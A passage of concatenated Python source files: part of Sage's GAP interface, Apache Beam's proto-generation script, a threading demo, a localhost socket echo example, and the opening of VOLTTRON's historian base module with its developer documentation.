# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [http://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
try:
idx = help.find('\n', idx + 1)
sline -= 1
except ValueError:
# We ran out of lines early somehow; this shouldn't
# happen though
break
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the worksheet filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]'%(self._name, n))
else:
return self.parent().new('%s%s'%(self._name, ''.join(['[%s]'%x for x in n])))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 you cannot use a workspace cache that had
no commandline to restore a gap session with commandline.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True, # py2
....: stderr=sp.STDOUT)
sage: gap_startup = sp.check_output(cmd, shell=True, # py3
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
GRPC_TOOLS = 'grpcio-tools>=1.3.5,<2'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
def generate_proto_files(force=False):
try:
import grpc_tools # pylint: disable=unused-variable
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path) for path in proto_files)):
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
if sys.version_info[0] >= 3:
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--verbose", "--no-diff",
out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
day27-2 多线程的使用.py
|
# 1. Import the threading module
import threading
import time
def sing():
# Get the current thread
current_thread = threading.current_thread()
print(current_thread)
for i in range(3):
print("sing...")
time.sleep(0.2)
def dance():
# Get the current thread
current_thread = threading.current_thread()
print(current_thread)
for i in range(3):
print("dance...")
time.sleep(0.2)
if __name__ == '__main__':
# Get the current thread
current_thread = threading.current_thread()
print(current_thread)
# 2. Create the child threads
sing_thread = threading.Thread(target=sing)
dance_thread = threading.Thread(target=dance)
# 3. Start the child threads' tasks
sing_thread.start()
dance_thread.start()
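# Not part of the original demo: if the main thread should wait for the
# child threads to finish before exiting, join them explicitly.
sing_thread.join()
dance_thread.join()
print("main thread: sing and dance finished")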
|
recvSend.py
|
# -*- coding: utf-8 -*-
from socket import *
import threading
import time
buffer_size = 2048
def server(host, port):
# Echo server: accept a single connection and echo received data back.
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(10)
conn, address = server_socket.accept()
while True:
data = conn.recv(buffer_size)
if len(data):
print("server recv:" + data.decode())
conn.send(data)
time.sleep(1)
def client(ip, port):
# Client: send ten numbered messages and print each echoed reply.
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((ip, port))
for i in range(10):
try:
data = "send number is " + str(i)
client_socket.send(data.encode())
data = client_socket.recv(buffer_size)
if len(data):
print("client recv:" + data.decode())
time.sleep(1)
except OSError:
pass
if __name__ == "__main__":
print("start recv and send...")
#t = threading.Thread(target=server, args=('0.0.0.0', 8102))
#t.start()
client('localhost', 8102)
|
base_historian.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
=====================
Historian Development
=====================
Support for storing and retrieving historical device and analysis data
published to the message bus is handled with Historian Agents. If a new type
of data store or a new way of storing data is desired, a new type of Historian
Agent should be created.
Historian Agents are implemented by subclassing :py:class:`BaseHistorian`.
Agents that need short term storage of device data should subscribe to device
data and use internal data structures for storage. Agents which need long
term Historical data that predates the startup of the Agent should interact
with a Historian Agent in order to obtain that data as needed.
While it is possible to create an Agent from scratch that gathers and stores
device data, it will miss out on the benefits of a proper Historian Agent
created by subclassing :py:class:`BaseHistorian`.
The :py:class:`BaseHistorian` class provides the following features:
- A separate thread for all communication with a data store removing the need
to use or implement special libraries to work with gevent.
- Automatically subscribe to and process device publishes.
- Automatically backup data retrieved off the message bus to a disk cache.
Cached data will only be removed once it is successfully published to a data
store.
- Existing Agents that publish analytical data for storage or query for
historical data will be able to use the new Historian without any code
changes.
- Data can be graphed in VOLTTRON Central.
Creating a New Historian
------------------------
To create a new Historian create a new Agent that subclasses
:py:class:`BaseHistorian`. :py:class:`BaseHistorian` inherits from
:py:class:`volttron.platform.vip.agent.Agent` so including it in the class
parents is not needed.
The new Agent must implement the following methods:
- :py:meth:`BaseHistorianAgent.publish_to_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topic_list`
- :py:meth:`BaseQueryHistorianAgent.query_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topics_metadata`
If this historian has a corresponding AggregateHistorian
(see :py:class:`AggregateHistorian`) implement the following method in addition
to the above ones:
- :py:meth:`BaseQueryHistorianAgent.query_aggregate_topics`
While not required this method may be overridden as needed:
- :py:meth:`BaseHistorianAgent.historian_setup`
Optionally a Historian Agent can inherit from :py:class:`BaseHistorianAgent`
instead of :py:class:`BaseHistorian` if support for querying data is not
needed for the data store. If this route is taken then VOLTTRON Central
will not be able to graph data from the store. It is possible to run more than
one Historian agent at a time to store data in more than one place. If needed
one can be used to allow querying while another is used to put data in the
desired store that does not allow querying.
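A minimal sketch of such a subclass is shown below. It is illustrative only:
the class name, the in-memory list, and the method bodies are assumptions made
for this example rather than part of the shipped implementation, and the
remaining required query methods (with their exact signatures taken from the
base classes) are omitted.

.. code-block:: python

    class InMemoryHistorian(BaseHistorian):
        # Toy historian that keeps every record in a Python list.

        def __init__(self, **kwargs):
            super(InMemoryHistorian, self).__init__(**kwargs)
            self._store = []

        def publish_to_historian(self, to_publish_list):
            # Pretend the whole batch was written successfully so that the
            # cached records can be removed.
            self._store.extend(to_publish_list)
            self.report_all_handled()

        def query_topic_list(self):
            return sorted({item['topic'] for item in self._store})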
Historian Execution Flow
------------------------
At startup the :py:class:`BaseHistorian` class starts a new thread to handle
all data caching and publishing (the publishing thread). The main thread then
subscribes to all Historian related topics on the message bus. Whenever
subscribed data comes in, it is published to a Queue to be processed by the
publishing thread as soon as possible.
At startup the publishing thread calls the following method:
- :py:meth:`BaseHistorianAgent.historian_setup` to give the implemented
historian a chance to set up any connections in the thread. This method can
also be used to load initial data into memory.
The process thread then enters the following logic loop:
::
Wait for data to appear in the Queue. Proceed if data appears or a
`retry_period` time elapses.
If new data appeared in Queue:
Save new data to cache.
While data is in cache:
Publish data to store by calling
:py:meth:`BaseHistorianAgent.publish_to_historian`.
If no data was published:
Go back to start and check Queue for data.
Remove published data from cache.
If we have been publishing for `max_time_publishing`:
Go back to start and check Queue for data.
The logic will also forgo waiting the `retry_period` for new data to appear
when checking for new data if publishing has been successful and there is
still data in the cache to be published. If
:py:meth:`BaseHistorianAgent.historian_setup` throws an exception, an alert
is raised but the process loop continues to wait for data and cache it. The
process loop periodically retries the setup call until it succeeds.
Exceptions thrown by :py:meth:`BaseHistorianAgent.publish_to_historian` also
raise alerts, and the process loop continues to back up data.
Storing Data
------------
The :py:class:`BaseHistorian` will call
:py:meth:`BaseHistorianAgent.publish_to_historian` as the time series data
becomes available. Data is batched in groups of up to `submit_size_limit` records.
After processing the list or individual items in the list
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` to report an individual point
of data was published or :py:meth:`BaseHistorianAgent.report_all_handled` to
report that everything from the batch was successfully published. This tells
the :py:class:`BaseHistorianAgent` class what to remove from the cache and if
any publishing was successful.
The `to_publish_list` argument of
:py:meth:`BaseHistorianAgent.publish_to_historian` is a list of records that
takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
As records are published to the data store
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` with the record or list of
records that was published or :py:meth:`BaseHistorianAgent.report_all_handled`
if everything was published.
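A sketch of per-record reporting is shown below. It is illustrative only;
``_write_record`` is a hypothetical helper for whatever store the concrete
historian uses, and a real implementation would match the exception type to
its own client library.

.. code-block:: python

    def publish_to_historian(self, to_publish_list):
        for record in to_publish_list:
            try:
                self._write_record(record['topic'], record['timestamp'],
                                   record['value'], record['meta'])
            except ConnectionError:
                # Leave this and the remaining records in the cache so they
                # are retried on the next pass of the process loop.
                break
            self.report_handled(record)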
Querying Data
-------------
- When a request is made to query data the
:py:meth:`BaseQueryHistorianAgent.query_historian` method is called.
- When a request is made for the list of topics in the store
:py:meth:`BaseQueryHistorianAgent.query_topic_list` will be called.
- When a request is made to get the metadata of a topic
:py:meth:`BaseQueryHistorianAgent.query_topics_metadata` will be called.
- When a request is made for the list of aggregate topics available
:py:meth:`BaseQueryHistorianAgent.query_aggregate_topics` will be called.
Other Notes
-----------
Implemented Historians must be tolerant of receiving the same data for
submission twice. While very rare, it is possible for a Historian to be
forcibly shut down after data is published but before it is removed from the
cache. When restarted, the :py:class:`BaseHistorian` will submit
the same data over again.
"""
import logging
import sqlite3
import threading
import weakref
from queue import Queue, Empty
from abc import abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from threading import Thread
import gevent
from gevent import get_hub
from functools import wraps
import pytz
import re
from dateutil.parser import parse
from volttron.platform.agent.base_aggregate_historian import AggregateHistorian
from volttron.platform.agent.utils import process_timestamp, \
fix_sqlite3_datetime, get_aware_utc_now, parse_timestamp_string
from volttron.platform.messaging import topics, headers as headers_mod
from volttron.platform.vip.agent import *
from volttron.platform.vip.agent import compat
from volttron.platform.vip.agent.subsystems.query import Query
from volttron.platform.async_ import AsyncCall
from volttron.platform.messaging.health import (STATUS_BAD,
STATUS_UNKNOWN,
STATUS_GOOD,
STATUS_STARTING,
Status)
try:
import ujson
from volttron.platform.jsonapi import dumps as _dumps, loads as _loads
def dumps(data):
try:
return ujson.dumps(data)
except Exception:
return _dumps(data)
def loads(data_string):
try:
return ujson.loads(data_string, precise_float=True)
except Exception:
return _loads(data_string)
except ImportError:
from volttron.platform.jsonapi import dumps, loads
from volttron.platform.agent import utils
_log = logging.getLogger(__name__)
# Build the parser
time_parser = None
ACTUATOR_TOPIC_PREFIX_PARTS = len(topics.ACTUATOR_VALUE.split('/'))
ALL_REX = re.compile('.*/all$')
# Register a better datetime parser in sqlite3.
fix_sqlite3_datetime()
def add_timing_data_to_header(headers, agent_id, phase):
if "timing_data" not in headers:
headers["timing_data"] = timing_data = {}
else:
timing_data = headers["timing_data"]
if agent_id not in timing_data:
timing_data[agent_id] = agent_timing_data = {}
else:
agent_timing_data = timing_data[agent_id]
agent_timing_data[phase] = utils.format_timestamp(utils.get_aware_utc_now())
values = list(agent_timing_data.values())
if len(values) < 2:
